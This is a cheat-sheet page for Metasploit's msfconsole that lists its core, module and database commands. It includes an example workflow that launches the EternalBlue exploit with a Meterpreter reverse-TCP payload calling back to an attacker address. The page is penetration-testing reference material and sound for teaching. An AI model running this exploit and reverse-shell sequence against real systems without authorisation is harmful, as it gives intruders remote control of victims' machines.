Skip to main content

Metasploit Framework (msfconsole)

Metasploit is a widely used penetration testing framework for developing, testing, and executing exploits. The msfconsole is its primary command-line interface.

Starting Metasploit

msfconsole

Core Commands

  • help or ? : Show help menu
  • search <term> : Search for modules
  • use <module> : Select a module
  • set <option> <value> : Set module options
  • show options : Show module options
  • run or exploit : Execute the selected module
  • sessions : List/manage sessions
  • jobs : List/manage background jobs
  • exit or quit : Exit msfconsole

Module Commands

  • info : Show info about a module
  • show <type> : List modules of a given type (e.g., exploits, payloads)
  • back : Go back from the current context
  • reload_all : Reload all modules

Database Commands

  • db_connect : Connect to a database
  • db_import <file> : Import scan results
  • hosts : List all hosts in the database
  • services : List all services
  • vulns : List all vulnerabilities
  • creds : List all credentials

Example Workflow

msfconsole
search exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.10
set LHOST 10.10.14.1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

Ranges and Lists

  • Many commands accept ranges (e.g., jobs -k 2-6,7,8,11..15)
  • IPs can be specified as lists, ranges, or CIDR (e.g., set RHOSTS 192.168.1.1-192.168.1.10,192.168.2.0/24)
  • See Nmap target specification for more details

Tips

  • Use tab for autocompletion
  • Use banner for a random Metasploit banner
  • Use sessions -i <id> to interact with a session
  • Use route to pivot through sessions

For more details, see the Metasploit Unleashed Guide